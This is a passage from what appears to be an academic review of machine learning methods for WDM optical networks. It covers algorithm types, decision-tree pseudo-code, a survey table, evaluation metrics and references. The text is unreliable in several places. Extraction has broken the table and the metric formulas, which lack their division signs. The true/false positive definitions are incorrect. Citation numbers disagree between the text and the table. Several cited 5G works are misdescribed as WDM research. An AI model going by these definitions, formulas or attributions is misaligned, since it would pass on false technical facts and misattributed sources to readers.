supervised learning. Apart from these, [4] few other machine learning algorithms
are explained further.
(1) Supervised learning: The algorithm that trains the machine using examples,
also known as instances, is known as supervised learning. Training and Test
are the two sets of data provided for learning through this method. A training
set includes instances of input and output. These instances are used to discover
patterns relevant to new inputs and outputs given to the machine [5]. Supervised
learning is distinguished in classification and regression. Classification maps
the input space into pre-defined classes. The regression approach maps input
space across the real-value domain [6]. The most commonly used supervised
learning algorithms are:
(a) Decision Tree: The algorithm that groups the attributes by sorting them
based on their values is known as a decision tree. There are nodes and
branches available in each tree. Each node represents attributes in a group
that is to be classified. A value that is assigned to the node is repre-
sented by each branch. The general implementation of the decision tree
algorithm is presented in Fig. 1.
(b) Naïve Bayes: The text classification industry mostly uses Naïve Bayes
algorithm for classification and clustering. It works on the principle of
conditional probability.
(c) Support Vector Machine: This is another most widely used machine
learning algorithm which is applied mainly in classification. Margin
calculation is the basic principle of this algorithm [7]. Margins are drawn
in between the classes in such a manner that there is the maximum
distance in between the margin and classes, as a result of which the
classification error is minimum.
(2) Unsupervised learning: It is the algorithm that includes the unlabelled input
with desired outputs. The input points closer to each other can be clustered
by this type of algorithm. The most commonly used unsupervised learning
technique viz. a) K-Means Clustering b) Principal Component Analysis [8].
(a) K-Means Clustering: In this technique, groups are created automatically
when applying clustering learning. A cluster includes items with similar
characteristics. Since k-distinct clusters are created, this algorithm is
known as k-means.
Impact of Machine Learning Algorithms on WDM … 647

Fig. 1 General flowchart of


decision tree algorithm [12]

(b) Principal Component Analysis (PCA): For making the computations


faster and easier, the dimensions of data are reduced using the PCA
algorithm.
(3) Semi-supervised learning: It is known as the algorithm that trains both labelled
and unlabelled data [9]. Firstly, the patterns are classified. Further, the data
is labelled as well as predicted in semi-supervised learning. Further Semi-
supervised learning includes self-training and transductive SVM
(a) Self-Training: A classifier is trained with some part of labelled data
and unlabelled data is given as input. In the training set, the unlabelled
648 S. Rai and A. K. Garg

points and predicted labels are added together, and further, the process
is iterated. The name of this classifier is self-training since it performs
learning on its own.
(b) Transductive SVM: This is an extension to the SVM algorithm. Both
labelled and unlabelled data are included in TSVM. In a manner that
the margin between the labelled and unlabelled data is maximum, the
unlabelled data is labelled [10].
(4) Reinforcement learning: The algorithm that uses observations from the
surrounding environment by interacting with it to take actions that would
increase the reward or reduce the risks is known as reinforcement learning.
(5) Neural Network Learning: It is also commonly known as artificial neural
network (ANN). This algorithm is designed on the basic concept of neurons
residing in the human brain. There are three layers in this algorithm. The input
is given to the input layer. The input is processed by the second layer, known
as the hidden layer. Finally, the calculated output is forwarded to the output
layer.
(6) Ensemble Learning: This algorithm combines different individual learners to
generate only one learner. This individual learner can be any of the above-
mentioned learners such as neural network, decision tree or naïve Bayes [11].
The experimental simulations have shown that the performance of collective
learners is always better as compared to that of one individual learner.
As shown in Fig. 1, the values of only one attribute are considered at a time by the
decision tree algorithm to create a tree model. The dataset on attribute value is sorted
initially by the algorithm. In the next step, the regions in a dataset which clearly
include only one class are identified. These regions are then marked as leaves. The
algorithm chooses another attribute for the remaining regions, which have more than
one number of classes. Only with the number of instances present in these regions,
the branching process is continued.
The process works iteratively until no attributes are left to generate leaves or until
all the leaves possible in those regions are generated. The pseudo-code of the optimal
decision tree algorithm is presented below:
Input: Data Partition, D // Defines set of training tuples, and their associated class
labels.
attribute_list // Defines candidate attributes set.
.attribute_selection_method // the best criterion that can be applied for partitioning
data tuples among individual classes is determined.
Output: A decision tree.
Algorithm:
• Create a node N;
• if all the tuples in D belong to similar class C, then
return N as a leaf node labeled with class C;
• if attribute_list is empty, then
return N as a leaf node labeled with majority class in D; // majority voting
Impact of Machine Learning Algorithms on WDM … 649

• apply attribute_selection_method for identifying the best splitting_criterion;


• label node N with splitting criterion;
• if splitting_attribute is discrete valued and multi-way splits allowed then // not
restricted to binary trees
• attribute_list – > attribute_list – splitting_attribute // eliminate splitting_attribute
• for each outcome j of splitting_criterion // the tuples are partitioned and for each
partition, sub-trees are generated.
• in D, let Dj be the set of data tuples to achieve outcome j; // a partition
• if Dj is empty then,
• attach a leaf labeled with the majority class in D to node N;
• else attach the node returned by Generate_decision_tree to node N;
endfor
• return N;
Due to their special features such as low cost and high capacity, the optical
networks include the basic physical infrastructure of all the large-provider networks
available. Due to their widespread use in almost all the current technologies, several
approaches have been proposed to improve optical network performance in terms
of their survivability, traffic grooming, wavelength assignment and routing [13].
This network must focus on provisioning the bandwidth for various services and
ensuring resource allocation in multiple dimensions. However, due to such require-
ments, the operation and maintenance of optical networks are complex compared
to other communication networks. The most commonly faced challenges in optical
networks are:
(1) Network Complexity: With the extension in scale of optical networks, the
number of complexity of their devices also increases [14]. Furthermore, in
communication systems, the optical network carries multiple heterogeneous
networks like cloud computing, IoT, WDM mobile networks and vehicle
networking.
(2) Service complexity: The optical networks are applied to provide varieties of
services at different levels of quality of service (QoS). The service provision is
expected to be implemented in real-time in new techniques and applications.
Therefore, ensuring that each level has QoS in limited time period is very
difficult for optical networks.
(3) Resource management complexity: Since it acts as a bridge in between the
upper layer traffic, the optical network must provide resource allocation to
handle traffic for the physical layer [15]. Huge amount of time is consumed
when allocating multiple resources in multiple dimensions. The complexity of
this process also increases due to the presence of varieties of resources.
To resolve all such challenges in optical networks, machine learning techniques are
used. ML techniques are applied in optical networks for network control and resource
management that are useful in service provisioning and resource assignment. These
techniques also provide intelligent monitoring tasks for optical networks such as
650 S. Rai and A. K. Garg

monitoring the performance of physical layer link, signal and failure management
[16].
Figure 2 shows the general system architecture of optical networks incorporating
machine learning techniques. This system deploys an intelligent module that includes
functional elements (FEs) and ML agents. FEs help in performing interactions among
the ML agent and optical networks. In this process, the raw data is first collected
from the optical network in the data collection module. Further, this data is pre-
processed to certain data structure through data processing module [17] so that it
can be used for training ML models. For supporting FE on network data collection

Fig. 2 General architecture


of ML incorporated with
optical networks [20]
Impact of Machine Learning Algorithms on WDM … 651

and processing, network protocols and functions are required to be improved. The
next step is to train the data which is done by forwarding this pre-processed network
data to the ML agents. There are three important paradigms of optical networks in
which the ML agent generally works [18]. They are: regression, classification and
decision-making. To solve the regression and classification problems, supervised and
unsupervised learning are applied. Iterative optimization is performed using learning
algorithms with training datasets to determine the ML model parameters as shown
in Fig. 2a. The methods that enhance the model performance are known as learning
algorithms. The optimal strategy is learned by the ML models in the decision-making
tasks by interacting with the environment which here is the optical network as shown
in Fig. 2b. Depending upon the performance of action, the algorithm receives a
reward in such networks. It is then possible to update the decision-making problems
using such rewards in new strategies. For most of the decision-making problems,
reinforcement learning methods are applied [19].
A leading infrastructure provider for the information and communication tech-
nology industry that supports the demand of accommodating growth in mobile traffic
and the varieties of new services that have diverse requirements is designed known
as WDM. It is important to include ML in making WDM vision conceivable consid-
ering the increase in complexity of networks and evolvement of new use cases with
time. This technology ensures that in comparison to previous technologies, the users
are provided with higher security, reliability and flexibility.
The paper is organized as follows. Section 1 introduces the basic concept of
machine learning in context to WDM optical networks. Section 2 describes the
previous research work in the development of WDM high-speed optical networks.
Section 3 outlines the performance parameters. Section 4 explains the performance
outcomes of existing techniques. Finally, we conclude the research paper with future
scope in Sect. 5 and 6, respectively.

2 Literature Survey

Gao et al. (2020) reviewed the different problems solved using machine learning
methods [21]. There are still many challenges being faced when applying ML tech-
niques to optical networks, although several advancements have been made on this
technology. The four typical applications that included AI techniques which are
power optimization, failure management, routing and wavelength assignment (RWA)
and low-margin design were reviewed in this paper. It was seen that in terms of reli-
ability and capacity, the performances of these applications were enhanced when
applying ML. Thus, the review outlined the possible challenges and future research
directions for optical networks using ML techniques.
Gu et al. (2020) presented a survey for intelligent optical networks applying ML.
Based on their use cases, the applications of ML were categorized [20]. Resource
management, optical networks monitoring and survivability and optical network
control were the common categorizations. Based on the ML techniques used, the use
652 S. Rai and A. K. Garg

cases were analysed and compared. Depending on such previous analysis, the new
motivations were derived. Additionally, this survey also discussed the challenges and
possible solutions for intelligent optical networks using ML.
Panayiotou et al. (2020) examined the different ML-based frameworks designed
to achieve QoT [22]. Since the requirements of QoTs are diverse, it was important
to identify appropriate frameworks. It was seen that particularly with the increase
in the number of diverse QoT requirements, distributed QoT model’s performance
was better compared to centralized ones. Additional QoS could be achieved in the
ML-based optical frameworks by analysing centralized and distributed frameworks
in terms of management and efficiency control.
Khan et al. (2020) proposed that for fibre-optic communication systems, the ML
techniques would provide unique and powerful signal processing tools [23]. For
resolving challenges that could not be handled using traditional approaches, ML
and big data analytics could provide better outcomes for optical networks, which
are growing with speed and are being more dynamic and software-defined. Thus, in
optical communications and networking, ML-based knowledge skills proved to be
highly beneficial.
Yang et al. (2020) proposed a new mechanism for achieving zero-touch operation
in optical network architecture [24]. Without any manual interference, the mainte-
nance and intent-based network operation-based issues could be resolved through
this approach. In optical network automatic operation, the functional entities of
architecture and interworking process were studied in this research. Experiments
were conducted, and the outcomes achieved showed that the intent translation and
zero-touch configuration were performed effectively. The zero-touch configuration
operation was protected by two closed loops, which included closed-loop policy and
closed-loop intent.
Hindia et al. (2020) proposed a comparative analysis of cognitive radio (CR)-based
technology in WDM technology [25]. Based on spectrum allocation methods, the
impact and roles of MAC layer in spectrum sensing and sharing were presented in this
research. The various intelligent routing protocols viable were analysed. The research
showed that the primary motivation of future research could be the issues related to
reduction in spectrum and lower usage of resources. For future WDM networks, the
CR technology could maximize the usage of highly unused communication spectrum
bands.
Troia et al. (2019) proposed research in which the dynamic SFC resource alloca-
tion was applied for software defined network (SDN)-based optical networks using
reinforcement learning (RL) [26]. For optimizing the resources allocation in multi-
layer networks, an RL system was designed in this research. Provided the state
of network and historical traffic traces, the decision of reconfiguring service func-
tion chains (SFCs) was made by RL agents. The proposed method was compared
with a rule-based optimization design which showed that the proposed method
provided better outcomes. The sudden changes in traffic shape were predicted, and
the reconfiguration of SFCs was triggered using this method.
Musumeci et al. (2019) presented a study of the optical communication and
networking approaches using ML [27]. A survey of relevant studies was conducted in
Impact of Machine Learning Algorithms on WDM … 653

this research, and an introductory tutorial on ML was performed to help researchers


in future research. Applying ML in optical networks is very new even though several
researches have been published. New possible research directions were outlined
through this research for providing ease in further research simulations.
Morocho-Cayamcela et al. (2019) proposed research on ML-based WDM
networks to provide potential solutions [28]. Initially, the previously existing ML-
based techniques were reviewed in this research to understand the fundamental
concepts. Further, to contribute to the WDM network requirements, the promising
ML-based techniques and their contributions were studied. The outcomes, limita-
tions and particular use cases for these techniques were studied. Towards the end,
the future perspectives for WDM were discussed. The roles of ML techniques were
simulated in this paper to deploy autonomous WDM mobile communications.
Toscano et al. (2019) proposed a novel deep learning algorithm for optical
networks [29]. A network slice request to be fulfilled by a service provider was
predicted in certain resources and channel constraints. To predict the channel condi-
tions for upcoming future technologies, a long short-term memory network was
designed and implemented in this research using deep learning algorithm. Conducted
experiments and achieved outcomes showed that the numbers of false-positive
allocations were reduced by 75% by applying this proposed approach.
Casellas et al. (2018) proposed a novel architecture for providing automatic
deploying in WDM services being applied in metropolitan networks [30]. For
allowing an interface among WDM access networks and elastic core optical networks,
this research was proposed. The infrastructure nodes, including storage, processing
resources and networking, were used to design this network segment also known
as metro-haul. The open and disaggregated optical networks were interconnected
with these infrastructure nodes. For covering the metropolitan networks that were an
interface with WDM access networks using elastic core optical networks, the WDM
services were deployed to provide control, management and orchestration.
Morais et al. (2018) proposed research through which the effectiveness of different
ML models was evaluated [31]. Predicting the QoT of a lightpath and increasing the
speed of lightpath provisioning were the goals of this research. For generating the
knowledge database through which the models were trained, three different network
scenarios were studied here. The most commonly used machine learning models
were also reviewed in this research. For estimating the QoT of lightpath, ML was
shown to be very effective as per this research. With accuracies of 99%, the ANNs
provided the best generalization. Further, the residual margin with an average error
less than 0.4 dB was predicted through ANNs.
Pelekanou et al. (2018) proposed a novel approach in which less complicated ML
techniques were applied to design optimal online WDM service provision frame-
works [32]. For making optimal decisions, neural networks (NNs) were applied. The
overall energy consumption of WDM infrastructures was aimed to be reduced using
this framework. The conducted experiments and achieved results showed that the
performances of systems, including highly complex but accurate ILP approach and
the ones including NN based real-time service, were very similar.
654 S. Rai and A. K. Garg

Wang et al. (2018) proposed research in which a hybrid method was identified as
channel coding for WDM communications in enhanced mobile broadband (eMBB)
scenario to support the polar codes for the LDPC codes and control plane [33].
Designing the powerful decoders at the terminal side was the major challenge faced in
this research. By concatenating an indicator section, a deep learning-based LDPC was
proposed here. A comparative evaluation was performed to evaluate the performances
of traditional and newly designed methods. The implementation resources were saved
here since the proposed unified approach applied similar network architecture and
parameters.
Fagbohun (2014), proposed a study in which the devices with effective connection
and communication services were provided with new ML technology with the aim
of increasing the flexibility of network connectivity and providing supporting capa-
bility [34]. The communication-related issues were not resolved using traditionally
designed techniques. Wireless technology has risen to a new level with the involve-
ment of WDM. These systems would work on providing simple network scenarios
with more functionality to the end nodes. The future concepts of mobile communica-
tion would link the multiple diverse research approaches being designed to provide
improvement in this field (Table 1).

3 Performance Parameters

It is important to measure the performance of an ML algorithm on any unseen or unla-


belled data such that its outputs can be determined when applied in real-time appli-
cations. Depending upon the task being performed by the system, the performance
measure can be specified generally.
a. Accuracy: The percentage of samples for which correct output is produced by
an algorithm is known as its accuracy. This parameter is used for tasks like
classification.
b. Error Rate: The proportion of examples for which an incorrect output is gener-
ated by the model is known as error rate. A test set of data that is isolated from
the data used for training ML is used for evaluating such performance measures
[27].
c. Confusion matrix: The complete overview of the classifier’s performance is
provided through the confusion matrix in case when a binary classification
problem is given in which the samples of the test set belong to either a positive
or a negative class. The matrix consists of TP and TN. TP are the true positives,
which are the sum total of samples of true class. TN are the true negatives
which are the sum total of samples [35] of false class. Additionally, there is FP
also known as false positives that are the sum total of samples included in true
class. There are FN also called false negatives that are the sum total of samples
included in false class. Here the accuracy can then be defined as:
Table 1 Comparative analysis of ML techniques for WDM optical networks
Ref. No. Authors names Year of publication Proposed technique Result outcomes Limitations and future scope
[18] Ruoxuan Gao et al. 2020 The four typical applications that It was seen that in terms of The network management
included AI techniques which are reliability and capacity, the operations to be performed in
power optimization, failure performances of these optical networks were not
management, routing and applications were enhanced when reviewed in this research and
wavelength assignment (RWA) applying ML. The review, thus, could be used as a future
and low-margin design were outlined the possible challenges perspective
reviewed in this paper and future research directions for
optical networks using ML
techniques
[19] Gu et al. 2020 Based on the ML techniques Several issues are faced when The joint operations of
used, the use cases were analysed using optical networks with MLs networks and computing
and compared. Depending on which were highlighted through resources were not discussed
such previous analysis, the new this research in this research. The future
motivations were derived research could focus of
removing this limitation
Impact of Machine Learning Algorithms on WDM …

[20] Panayiotou, et al. 2020 Since the requirements of QoTs It was seen that particularly with QoS could be achieved in the
are diverse, it was important to the increase in number of diverse ML-based optical frameworks
identify appropriate frameworks. QoT requirements, the by analysing centralized and
Depending upon the training time performance of distributed QoT distributed frameworks in
and accuracy, the simulations models was better as compared to terms of management and
were performed centralized ones efficiency control
[21] Khan et al. 2020 For resolving challenges which Thus, in optical communications The computational
could not be handled using and networking, ML-based complexity of ML algorithms
traditional approaches, the ML knowledge skills proved to be was not discussed in this
and big data analytics could highly beneficial paper which could be a
provide better outcomes for motivation to extend this
optical networks which are research in future
growing with speed and are being
more dynamic and
655

software-defined
(continued)
Table 1 (continued)
656

Ref. No. Authors names Year of publication Proposed technique Result outcomes Limitations and future scope
[22] Yang, Zhan, et al. 2020 A new mechanism was proposed The zero-touch configuration There was a huge reality gap
for achieving zero-touch operation was protected by two between the simulation and
operation in optical network closed loops real networks which could be
architecture. Without any manual used as a motivation to extend
interference, the maintenance and this research in future
intent-based network
operation-based issues could be
resolved through this approach
[23] Hindia et al. 2020 A comparative analysis of The research showed that the For future WDM networks,
cognitive radio (CR)-based primary motivation of future the CR technology could
technology in WDM technology research could be the issues maximize the usage of highly
was presented. Based on related to reducing spectrum and unused communication
spectrum allocation methods, the underutilization of resources spectrum bands
utilization of MAC was presented
in this research
[24] Troia et al. 2019 The dynamic SFC resource The outcomes showed a rapid The computational
allocation was applied for variation in the traffic as well as complexity of ML algorithms
SDN-based optical networks triggering of reconfiguration of was not discussed in this
using RL. For optimizing the SFCs paper which could be a
resources allocation in motivation to extend this
multi-layer networks, an RL research in future
system was designed
[25] Musumeci et al. 2019 A survey of relevant studies was New possible research directions The computational
conducted in this research and an were outlined through this complexity of ML algorithms
introductory tutorial on ML was research for providing ease in was not discussed in this
performed to help researchers in further research simulations research. This could be used
future research. Applying ML in in a future direction to extend
optical networks is very new this research
even though several researches
S. Rai and A. K. Garg

have been published


(continued)
Table 1 (continued)
Ref. No. Authors names Year of publication Proposed technique Result outcomes Limitations and future scope
[26] Eugenio et al. 2019 A research was proposed on Towards the end, the future The security of optical
ML-based WDM networks to perspectives for WDM were networks was not discussed in
provide potential solutions. discussed. The roles of ML this research. Using ML
Initially, the previously existing techniques were simulated in this algorithms could introduce
ML-based techniques were paper to deploy autonomous several intrusions and optical
reviewed in this research to WDM mobile communications. networks might face
understand the fundamental integrity-based challenges
concepts. Further, to contribute to which can be studied in future
the WDM network requirements, research
the promising ML-based
techniques and their
contributions were studied
[27] Toscano et al. 2019 To predict the channel conditions Conducted experiments and The computational
for upcoming future achieved outcomes showed that complexity of ML algorithms
technologies, a long short-term the numbers of false positive was not discussed in this
Impact of Machine Learning Algorithms on WDM …

memory network was designed allocations were reduced by 75% research. This could be used a
and implemented in this research by applying this proposed future direction to extend this
using deep learning algorithm approach research
[28] Casellas et al. 2018 A novel architecture was For covering the metropolitan The computational
proposed for providing automatic networks that were an interface complexity of ML algorithms
deploying in WDM services with WDM using optical was not discussed in this
being applied in metropolitan networks, the WDM services paper which could be a
networks. For allowing an were deployed to provide control, motivation to extend this
interface among WDM as well as management and orchestration research in future
optical networks, this research
was proposed
[9] Morais et al. 2018 The effectiveness of different ML With accuracies of 99%, the The future concepts of mobile
models was evaluated. Predicting ANNs provided the best communication would link
the QoT of a lightpath and generalization. Further, the the multiple diverse research
657

increasing the speed of lightpath residual margin with average approaches being designed to
provisioning were the goals of error less than 0.4 dB was provide improvement in this
this research predicted through ANNs field
(continued)
Table 1 (continued)
658

Ref. No. Authors names Year of publication Proposed technique Result outcomes Limitations and future scope
[30] Pelekano et al. 2018 A novel approach was proposed The conducted experiments and There was a huge reality gap
in which less-complex ML achieved results showed that the in between the simulation and
techniques were applied to design performances of systems real networks which could be
optimal online WDM service including highly complex but used a motivation to extend
provision frameworks. For accurate ILP approach and the this research in future
making optimal decisions, neural ones including NN-based
networks (NNs) were applied real-time service, were very
similar
[31] Wang et al. 2018 A hybrid method was identified The implementation resources This research did not focus on
as channel coding for WDM were saved here since the the attacks and intrusion
communications in enhanced proposed unified approach detection methods for optical
mobile broadband (eMBB) applied similar network networks applying ML
scenario. By concatenating an architecture and parameters algorithms. The future
indicator section, a deep research could focus on this
learning-based unified challenge
polar-LDPC was proposed here
[32] Fagbohun 2014 The devices with effective The communication-related The future concepts of mobile
connection and communication issues were not resolved using communication would link
services were provided with new traditionally designed techniques. the multiple diverse research
ML technology with the aim of These systems would work on approaches being designed to
increasing the flexibility of providing simple network provide improvement in this
network connectivity and scenarios with more functionality field
providing supporting capability to the end nodes
S. Rai and A. K. Garg
Impact of Machine Learning Algorithms on WDM … 659

Accuracy = (TP + TN)(TP + TN + FP + FN) (1)

d. Average log-probability: This performance metric is used for unsupervised


learning tasks as it provides a continuous-valued score for every example.
e. True Positive Rate (TPR): The ability to identify actually positive samples in
the test set is defined by this metric.

TPR = TP(TP + FN) (2)

f. False Positive Rate (FPR): The fraction of negative samples within the test set
that are classified incorrectly as positive are represented by FPR.

FPR = FP(FP + TN) (3)

g. Area-Under-Curve (AUC): It is designed as the aggregate performance measure


among the total classification thresholds calculated. In other words, it is the prob-
ability that indicates higher possibility of model ranking as a random positive
instance as compared to an unexpected negative instance [36].

4 Performance Outcomes of Existing Techniques

To control heterogeneous optical networks, various ML techniques were applied that


were reviewed in terms of their performance outputs in [37]. Case-based reasoning
(CBR), naïve Bayes, J4.8 tree and decision tree were compared to evaluate their
outcomes. It was seen that with the highest accuracy of 99% and AUC of 0.97, CBR
provided the best outcomes. To predict the optimization and performance outcomes
of ML techniques, k-nearest neighbour and random forest (RF) were compared in
[34]. With 97% accuracy and AUC of 0.98, RF provided better outputs as per the
simulations. To perform lightpath classification with better outcomes, k-NN, SVM
and RF were compared in [38]. With 99.15% accuracy and AUC of 0.9909, SVM
proved to be better than other algorithms. To detect equipment failures in optical
networks, three commonly used ML techniques SVM, RF and NN were compared
[39]. With 100% of accuracy and AUC of 0.99, SVM provided the best simulation
outputs. Table 2 presents the outputs of these techniques as rational values. The
comparative analysis of these techniques is also shown in Figs. 3 and 4 in terms of
accuracy and AUC, respectively.

Table 2 Comparative
Performance parameter CBR [33] RF[34] SVM [35]
analysis of various techniques
in terms of accuracy and AUC Accuracy 99% 97% 99.15%
AUC 0.97 0.98 0.9909
660 S. Rai and A. K. Garg

Fig. 3 Comparison of ML
algorithms in terms of
accuracy

Fig. 4 Performance analysis


of ML algorithms in terms of
AUC

5 Conclusion

This paper reviews several machine learning-based algorithms applied in optical


networks for high-speed WDM networks. Recently, optical networks have been
evolving in several applications like 5G and IoT. Advancements have been made in
these networks by applying machine learning algorithms. Also, the machine learning
applications in the estimation of QoT, traffic estimation and prediction of crosstalk,
etc., are also elaborated. Further, this paper also highlights the challenges, issues
and future techniques related to WDM high-speed optical networks. Lastly, this
paper concludes SVM, RF and CBR provide better simulation outcomes in terms of
accuracy and AUC performance parameters.

6 Future Scope

This review also outlines the future directions through which this technology can be
improved. ML algorithms used in optical networks make them vulnerable to various
security attacks and intrusions. To maintain the data integrity, future research could
Impact of Machine Learning Algorithms on WDM … 661

provide more reliable and secure techniques. Additionally, the new approaches could
emphasize on maximizing the usage of highly unused communication spectrum
bands in optical networks.

References

1. Liu, J., Wang, G., Hu, P., Duan, L. Y., & Kot, A. C. (2017). Global context-aware attention
LSTM networks for 3D action recognition. In Proceedings—30th IEEE Conference Computer
Vision Pattern Recognition, CVPR 2017 (vol. 2017-Janua, pp. 3671–3680). https://doi.org/10.
1109/CVPR.2017.391.
2. Zibar, D., Piels, M., Jones, R., & Schaeffer, C. G. (2015). Machine learning techniques in
optical communication. https://doi.org/10.1109/ECOC.2015.7341896.
3. Tiwari, P., et al. (2018). Detection of subtype blood cells using deep learning. Cognitive Systems
Research, 52, 1036–1044. https://doi.org/10.1016/j.cogsys.2018.08.022
4. Pan, C., Henning, B., Idler, W., Schmalen, L., & Fellow, F. R. K. (2015). Optical nonlinear-
phase-noise compensation for a code-aided expectation-maximization algorithm (no. July,
pp. 1–8).
5. Xu, R., & Wunsch, D. (2005). Survey of clustering algorithms. IEEE Transactions on Neural
Networks, 16(3), 645–678. https://doi.org/10.1109/TNN.2005.845141
6. Song, C., Zhang, M., Huang, X., Zhan, Y., Wang, D., Liu, M. (2018). Machine learning enabling
traffic-aware dynamic slicing for 5G optical transport networks. [Online]. Available: https://
www.osapublishing.org/oe/viewmedia.cfm?uri=oe-21-12-14859&seq=0.
7. Macaluso, I., Finn, D., Ozgul, B., & Dasilva, L. A. (2013). Complexity of spectrum activity and
benefits of reinforcement learning for dynamic channel selection. IEEE Journal on Selected
Areas in Communications, 31(11), 2237–2248. https://doi.org/10.1109/JSAC.2013.131115
8. Ye, H., Li, G. Y., & Juang, B. H. (2018). power of deep learning for channel estimation and signal
detection in OFDM systems. IEEE Wireless Communication Letter, 7(1), 114–117. https://doi.
org/10.1109/LWC.2017.2757490
9. T. J. O’Shea, Erpek, T., & Charles Clancy, T. (2017) Deep learning-based MIMO communi-
cations. arXiv, pp. 1–9.
10. Thrane, J., Wass, J., Piels, M., Diniz, J. C. M., Jones, R. T., & Zibar, D. (2017). Machine
learning technique for optical performance monitoring from directly detected PDM-QAM
signals. Journal of Lightwave Technology, 35(4), 868–875.
11. Angelou, M., Pointurier, Y., Careglio, D., & Spadaro, S. (2012). Optimized monitor placement
for accurate QoT assessment in core optical networks. Journal of Optical Communications
and Networking, 4(1), 15–24. [Online]. Available: https://www.osapublishing.org/oe/abstract.
cfm?uri=oe-18-2-670.
12. Karim, M., & Rahman, R. M. (2013). Decision Tree and Naïve Bayes Algorithm for Classi-
fication and Generation of Actionable Knowledge for Direct Marketing. Journal of Software
Engineering and Applications, 06(04), 196–206. https://doi.org/10.4236/jsea.2013.64025
13. Sartzetakis, I., Christodoulopoulos, K., Tsekrekos, C. P., Syvridis, D., & Varvarigos, E. (2016).
Quality of transmission estimation in WDM and elastic optical networks accounting for space-
spectrum dependencies. Journal of Optical Communications and Networking, 8(9), 676–688.
https://doi.org/10.1364/JOCN.8.000676
14. Pointurier, Y., Coates, M., & Rabbat, M. (2011). Cross-layer monitoring in transparent optical
networks. Journal of Optical Communications and Networking, 3(3), 189–198. https://doi.org/
10.1364/JOCN.3.000189
15. Sambo, N., Pointurier, Y., Cugini, F., Valcarenghi, L., Castoldi, P., & Tomkos, I. (2010). Light-
path establishment assisted by offline QoT estimation in transparent optical networks. Journal
of Optical Communications and Networking, 2(11), 928–937. https://doi.org/10.1364/JOCN.
2.000928
662 S. Rai and A. K. Garg

16. Barletta, L., Giusti, A., Rottondi, C., & Tornatore, M. (2017). QoT estimation for unestablished
lighpaths using machine learning. In 2017 Opt. Fiber Commun. Conf. Exhib. OFC 2017 - Proc.,
pp. 5–7, 2017, doi: https://doi.org/10.1364/ofc.2017.th1j.1.
17. Seve, E., Pesic, J., Delezoide, C., Bigo, S., & Pointurier, Y. (2018). Learning process for
reducing uncertainties on network parameters and design margins. Journal of Optical Commu-
nications and Networking, 10(2), A298–A306. https://doi.org/10.1364/JOCN.10.00A298
18. Panayiotou, T., Ellinas, G., & Chatzis, S. P. (2016). A data-driven QoT decision approach
for multicast connections in metro optical networks. In 2016 International Conference on
Optical Network Design and Modeling ONDM 2016, no. Dec 2017, 2016 https://doi.org/10.
1109/ONDM.2016.7494074.
19. Panayiotou, T., Chatzis, S. P., & Ellinas, G. (2017). Performance analysis of a data-driven
quality-of-transmission decision approach on a dynamic multicast- capable metro optical
network. Journal of Optical Communications and Networking, 9(1), 98–108. https://doi.org/
10.1364/JOCN.9.000098
20. Gu, R., Yang, Z., & Ji, Y. (2020). Machine learning for intelligent optical networks: A compre-
hensive survey. Journal of Networking Computer Application, 157. https://doi.org/10.1016/j.
jnca.2020.102576.
21. Gao, R., et al. (2020). An overview of ML-based applications for next generation optical
networks. Science China Information Sciences, 63(6), 1–16. https://doi.org/10.1007/s11432-
020-2874-y
22. Panayiotou, T., Savva, G., Tomkos, I., & Ellinas, G. (2019). Centralized and distributed machine
learning-based QoT estimation for sliceable optical networks. arXiv.
23. Khan, F. N., Fan, Q., Lu, C., & Lau, A. P. T. (2019). Machine learning methods for optical
communication systems and networks. Elsevier Inc.,.
24. Zhan, K., et al. (2020). Intent defined optical network: Toward artificial intelligence-based
optical network automation. In Optics InfoBase Conference Papers (vol. Part F174-, no. June,
pp. 1–12, 2020). https://doi.org/10.1364/OFC.2020.T3J.6.
25. Hindia, M. N., Qamar, F., Ojukwu, H., Dimyati, K., Al-Samman, A. M., & Amiri, I. S.
(2020). On Platform to Enable the Cognitive Radio Over 5G Networks. Wireless Personal
Communications, 113(2), 1241–1262. https://doi.org/10.1007/s11277-020-07277-3
26. Troia, S., Alvizu, R., & Maier, G. (2019). Reinforcement learning for service function chain
reconfiguration in NFV-SDN metro-core optical networks. IEEE Access, 7, 167944–167957.
https://doi.org/10.1109/ACCESS.2019.2953498
27. Musumeci, F., et al. (2019). An Overview on Application of Machine Learning Techniques in
Optical Networks. IEEE Communication Survey Tutorials, 21(2), 1383–1408. https://doi.org/
10.1109/COMST.2018.2880039
28. Morocho-Cayamcela, M. E., Lee, H., & Lim, W. (2019). Machine learning for 5G/B5G
mobile and wireless communications: Potential, limitations, and future directions. IEEE Access,
7(Sept), 137184–137206. https://doi.org/10.1109/ACCESS.2019.2942390
29. Toscano, M., Grunwald, F., Richart, M., Baliosian, J., Grampín, E., & Castro, A. (2019).
Machine learning aided network slicing. In International Conference on Transparent Optical
Networks (ICTON) (Vol. 2019-July, pp. 8–11, 2019). https://doi.org/10.1109/ICTON.2019.884
0141.
30. Casellas, R., et al. (2018). Enabling data analytics and machine learning for 5G services
within disaggregated multi-layer transport networks. In International Conference on Trans-
parent Optical Networks (ICTON) (vol. 2018-July, pp. 1–4). https://doi.org/10.1109/ICTON.
2018.8473832.
31. Morais, R. M., & Pedro, J. (2018). Machine learning models for estimating quality of trans-
mission in DWDM networks. Journal of Optical Communications and Networking, 10(10),
D84–D99. https://doi.org/10.1364/JOCN.10.000D84
32. Pelekanou, A., Anastasopoulos, M., Tzanakaki, A., & Simeonidou, D. (2018). Provisioning
of 5G services employing machine learning techniques. In 2018 International Conference on
Optical Network Design and Modeling (ONDM) 2018—Proceedings (vol. 1, pp. 200–205)
https://doi.org/10.23919/ONDM.2018.8396131.
Impact of Machine Learning Algorithms on WDM … 663

33. Wang, Y., Zhang, Z., Zhang, S., Cao, S., & Xu, S. (2018). A unified deep learning based
polar-LDPC decoder for 5G communication systems. In 2018 10th International Conferences
of Wireless Communication Signal Process. WCSP 2018 (pp. 1–6). https://doi.org/10.1109/
WCSP.2018.8555891.
34. Fagbohun, O. O. (2014). Comparative studies on 3G,4G and 5G wireless technology. IOSR
Journal Electronics Communication Engineering, 9(2), 133–139. https://doi.org/10.9790/
2834-0925133139
35. Alzubi, O. A., Alzubi, J. A., Alweshah, M., Qiqieh, I., Al-Shami, S., & Ramachandran,
M. (2020). An optimal pruning algorithm of classifier ensembles: Dynamic programming
approach. Neural Computing and Applications, 32(20), 16091–16107. https://doi.org/10.1007/
s00521-020-04761-6
36. Rottondi, C., Barletta, L., Giusti, A., & Tornatore, M. (2018). Machine-learning method for
quality of transmission prediction of unestablished lightpaths. Journal of Optical Communi-
